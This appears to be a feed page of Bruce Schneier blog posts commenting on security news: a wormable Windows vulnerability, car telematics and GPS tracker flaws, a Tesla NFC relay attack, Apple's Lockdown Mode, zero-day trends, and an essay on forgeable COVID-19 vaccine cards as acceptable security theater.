close
  • Sc chevron_right

    Critical Microsoft Code-Execution Vulnerability

    news.movim.eu / Schneier · Wednesday, 21 December - 19:03 · 1 minute

A critical code-execution vulnerability in Microsoft Windows was patched in September. It seems that researchers just realized how serious it was (and is):

Like EternalBlue, CVE-2022-37958, as the latest vulnerability is tracked, allows attackers to execute malicious code with no authentication required. Also, like EternalBlue, it’s wormable, meaning that a single exploit can trigger a chain reaction of self-replicating follow-on exploits on other vulnerable systems. The wormability of EternalBlue allowed WannaCry and several other attacks to spread across the world in a matter of minutes with no user interaction required.

But unlike EternalBlue, which could be exploited when using only the SMB, or server message block, a protocol for file and printer sharing and similar network activities, this latest vulnerability is present in a much broader range of network protocols, giving attackers more flexibility than they had when exploiting the older vulnerability.

[…]

Microsoft fixed CVE-2022-37958 in September during its monthly Patch Tuesday rollout of security fixes. At the time, however, Microsoft researchers believed the vulnerability allowed only the disclosure of potentially sensitive information. As such, Microsoft gave the vulnerability a designation of “important.” In the routine course of analyzing vulnerabilities after they’re patched, Palmiotti discovered it allowed for remote code execution in much the way EternalBlue did. Last week, Microsoft revised the designation to critical and gave it a severity rating of 8.1, the same given to EternalBlue.

  • Sc chevron_right

    Sirius XM Software Vulnerability

    news.movim.eu / Schneier · Thursday, 1 December - 15:10

This is new :

Newly revealed research shows that a number of major car brands, including Honda, Nissan, Infiniti, and Acura, were affected by a previously undisclosed security bug that would have allowed a savvy hacker to hijack vehicles and steal user data. According to researchers, the bug was in the car’s Sirius XM telematics infrastructure and would have allowed a hacker to remotely locate a vehicle, unlock and start it, flash the lights, honk the horn, pop the trunk, and access sensitive customer info like the owner’s name, phone number, address, and vehicle details.

Cars are just computers with four wheels and an engine. It’s no surprise that the software is vulnerable, and that everything is connected.

  • Sc chevron_right

    Relay Attack against Teslas

    news.movim.eu / Schneier · Thursday, 15 September - 15:28 · 1 minute

Nice work :

Radio relay attacks are technically complicated to execute, but conceptually easy to understand: attackers simply extend the range of your existing key using what is essentially a high-tech walkie-talkie. One thief stands near you while you’re in the grocery store, intercepting your key’s transmitted signal with a radio transceiver. Another stands near your car, with another transceiver, taking the signal from their friend and passing it on to the car. Since the car and the key can now talk, through the thieves’ range extenders, the car has no reason to suspect the key isn’t inside—and fires right up.

But Tesla’s credit card keys, like many digital keys stored in cell phones , don’t work via radio. Instead, they rely on a different protocol called Near Field Communication or NFC. Those keys had previously been seen as more secure, since their range is so limited and their handshakes with cars are more complex.

Now, researchers seem to have cracked the code . By reverse-engineering the communications between a Tesla Model Y and its credit card key, they were able to properly execute a range-extending relay attack against the crossover. While this specific use case focuses on Tesla, it’s a proof of concept—NFC handshakes can, and eventually will, be reverse-engineered.

  • Sc chevron_right

    Apple’s Lockdown Mode

    news.movim.eu / Schneier · Sunday, 31 July, 2022 - 18:21 · 1 minute

I haven’t written about Apple’s Lockdown Mode yet, mostly because I haven’t delved into the details. This is how Apple describes it:

Lockdown Mode offers an extreme, optional level of security for the very few users who, because of who they are or what they do, may be personally targeted by some of the most sophisticated digital threats, such as those from NSO Group and other private companies developing state-sponsored mercenary spyware. Turning on Lockdown Mode in iOS 16, iPadOS 16, and macOS Ventura further hardens device defenses and strictly limits certain functionalities, sharply reducing the attack surface that potentially could be exploited by highly targeted mercenary spyware.

At launch, Lockdown Mode includes the following protections:

  • Messages: Most message attachment types other than images are blocked. Some features, like link previews, are disabled.
  • Web browsing: Certain complex web technologies, like just-in-time (JIT) JavaScript compilation, are disabled unless the user excludes a trusted site from Lockdown Mode.
  • Apple services: Incoming invitations and service requests, including FaceTime calls, are blocked if the user has not previously sent the initiator a call or request.
  • Wired connections with a computer or accessory are blocked when iPhone is locked.
  • Configuration profiles cannot be installed, and the device cannot enroll into mobile device management (MDM), while Lockdown Mode is turned on.

What Apple has done here is really interesting. It’s common to trade security off for usability, and the results of that are all over Apple’s operating systems—and everywhere else on the Internet. What they’re doing with Lockdown Mode is the reverse: they’re trading usability for security. The result is a user experience with fewer features, but a much smaller attack surface. And they aren’t just removing random features; they’re removing features that are common attack vectors.

There aren’t a lot of people who need Lockdown Mode, but it’s an excellent option for those who do.

News article .

EDITED TO ADD (7/31): An analysis of the effect of Lockdown Mode on Safari.

  • Sc chevron_right

    Critical Vulnerabilities in GPS Trackers

    news.movim.eu / Schneier · Thursday, 21 July, 2022 - 13:36 · 1 minute

This is a dangerous vulnerability:

An assessment from security firm BitSight found six vulnerabilities in the Micodus MV720 , a GPS tracker that sells for about $20 and is widely available. The researchers who performed the assessment believe the same critical vulnerabilities are present in other Micodus tracker models. The China-based manufacturer says 1.5 million of its tracking devices are deployed across 420,000 customers. BitSight found the device in use in 169 countries, with customers including governments, militaries, law enforcement agencies, and aerospace, shipping, and manufacturing companies.

BitSight discovered what it said were six “severe” vulnerabilities in the device that allow for a host of possible attacks. One flaw is the use of unencrypted HTTP communications that makes it possible for remote hackers to conduct adversary-in-the-middle attacks that intercept or change requests sent between the mobile application and supporting servers. Other vulnerabilities include a flawed authentication mechanism in the mobile app that can allow attackers to access the hardcoded key for locking down the trackers and the ability to use a custom IP address that makes it possible for hackers to monitor and control all communications to and from the device.

The security firm said it first contacted Micodus in September to notify company officials of the vulnerabilities. BitSight and CISA finally went public with the findings on Tuesday after trying for months to privately engage with the manufacturer. As of the time of writing, all of the vulnerabilities remain unpatched and unmitigated.

These are computers and computer vulnerabilities, but because the computers are attached to cars, the vulnerabilities become potentially life-threatening. CISA writes :

These vulnerabilities could impact access to a vehicle fuel supply, vehicle control, or allow locational surveillance of vehicles in which the device is installed.

I wouldn’t have buried “vehicle control” in the middle of that sentence.

  • Sc chevron_right

    Zero-Day Vulnerabilities Are on the Rise

    news.movim.eu / Schneier · Wednesday, 27 April, 2022 - 18:40 · 1 minute

Both Google and Mandiant are reporting a significant increase in the number of zero-day vulnerabilities reported in 2021.

Google:

2021 included the detection and disclosure of 58 in-the-wild 0-days, the most ever recorded since Project Zero began tracking in mid-2014. That’s more than double the previous maximum of 28 detected in 2015 and especially stark when you consider that there were only 25 detected in 2020. We’ve tracked publicly known in-the-wild 0-day exploits in this spreadsheet since mid-2014.

While we often talk about the number of 0-day exploits used in-the-wild, what we’re actually discussing is the number of 0-day exploits detected and disclosed as in-the-wild. And that leads into our first conclusion: we believe the large uptick in in-the-wild 0-days in 2021 is due to increased detection and disclosure of these 0-days, rather than simply increased usage of 0-day exploits.

Mandiant:

In 2021, Mandiant Threat Intelligence identified 80 zero-days exploited in the wild, which is more than double the previous record volume in 2019. State-sponsored groups continue to be the primary actors exploiting zero-day vulnerabilities, led by Chinese groups. The proportion of financially motivated actors­ — particularly ransomware groups — ­deploying zero-day exploits also grew significantly, and nearly 1 in 3 identified actors exploiting zero-days in 2021 was financially motivated. Threat actors exploited zero-days in Microsoft, Apple, and Google products most frequently, likely reflecting the popularity of these vendors. The vast increase in zero-day exploitation in 2021, as well as the diversification of actors using them, expands the risk portfolio for organizations in nearly every industry sector and geography, particularly those that rely on these popular systems.

News article .

  • Sc chevron_right

    Wyze Camera Vulnerability

    news.movim.eu / Schneier · Thursday, 31 March, 2022 - 19:36

Wyze ignored a vulnerability in its home security cameras for three years. Bitdefender, who discovered the vulnerability, let the company get away with it.

In case you’re wondering, no, that is not normal in the security community. While experts tell me that the concept of a “responsible disclosure timeline” is a little outdated and heavily depends on the situation, we’re generally measuring in days , not years. “The majority of researchers have policies where if they make a good faith effort to reach a vendor and don’t get a response, that they publicly disclose in 30 days,” Alex Stamos, director of the Stanford Internet Observatory and former chief security officer at Facebook, tells me.

  • Sc chevron_right

    Why Vaccine Cards Are So Easily Forged

    news.movim.eu / Schneier · Thursday, 17 March, 2022 - 20:41 · 4 minutes

My proof of COVID-19 vaccination is recorded on an easy-to-forge paper card . With little trouble, I could print a blank form, fill it out, and snap a photo. Small imperfections wouldn’t pose any problem; you can’t see whether the paper’s weight is right in a digital image. When I fly internationally, I have to show a negative COVID-19 test result. That, too, would be easy to fake. I could change the date on an old test, or put my name on someone else’s test, or even just make something up on my computer. After all, there’s no standard format for test results; airlines accept anything that looks plausible.

After a career spent in cybersecurity, this is just how my mind works: I find vulnerabilities in everything I see. When it comes to the measures intended to keep us safe from COVID-19, I don’t even have to look very hard. But I’m not alarmed. The fact that these measures are flawed is precisely why they’re going to be so helpful in getting us past the pandemic.

Back in 2003, at the height of our collective terrorism panic, I coined the term security theater to describe measures that look like they’re doing something but aren’t. We did a lot of security theater back then: ID checks to get into buildings, even though terrorists have IDs; random bag searches in subway stations, forcing terrorists to walk to the next station; airport bans on containers with more than 3.4 ounces of liquid, which can be recombined into larger bottles on the other side of security. At first glance, asking people for photos of easily forged pieces of paper or printouts of readily faked test results might look like the same sort of security theater. There’s an important difference, though, between the most effective strategies for preventing terrorism and those for preventing COVID-19 transmission.

Security measures fail in one of two ways: Either they can’t stop a bad actor from doing a bad thing, or they block an innocent person from doing an innocuous thing. Sometimes one is more important than the other. When it comes to attacks that have catastrophic effects—say, launching nuclear missiles—we want the security to stop all bad actors, even at the expense of usability. But when we’re talking about milder attacks, the balance is less obvious. Sure, banks want credit cards to be impervious to fraud, but if the security measures also regularly prevent us from using our own credit cards, we would rebel and banks would lose money. So banks often put ease of use ahead of security.

That’s how we should think about COVID-19 vaccine cards and test documentation. We’re not looking for perfection. If most everyone follows the rules and doesn’t cheat, we win. Making these systems easy to use is the priority. The alternative just isn’t worth it.

I design computer security systems for a living. Given the challenge, I could design a system of vaccine and test verification that makes cheating very hard. I could issue cards that are as unforgeable as passports, or create phone apps that are linked to highly secure centralized databases. I could build a massive surveillance apparatus and enforce the sorts of strict containment measures used in China’s zero-COVID-19 policy. But the costs—in money, in liberty, in privacy—are too high. We can get most of the benefits with some pieces of paper and broad, but not universal, compliance with the rules.

It also helps that many of the people who break the rules are so very bad at it. Every story of someone getting arrested for faking a vaccine card, or selling a fake, makes it less likely that the next person will cheat. Every traveler arrested for faking a COVID-19 test does the same thing. When a famous athlete such as Novak Djokovic gets caught lying about his past COVID-19 diagnosis when trying to enter Australia, others conclude that they shouldn’t try lying themselves.

Our goal should be to impose the best policies that we can, given the trade-offs. The small number of cheaters isn’t going to be a public-health problem. I don’t even care if they feel smug about cheating the system. The system is resilient; it can withstand some cheating.

Last month, I visited New York City, where restrictions that are now being lifted were then still in effect. Every restaurant and cocktail bar I went to verified the photo of my vaccine card that I keep on my phone, and at least pretended to compare the name on that card with the one on my photo ID. I felt a lot safer in those restaurants because of that security theater, even if a few of my fellow patrons cheated.

This essay previously appeared in the Atlantic .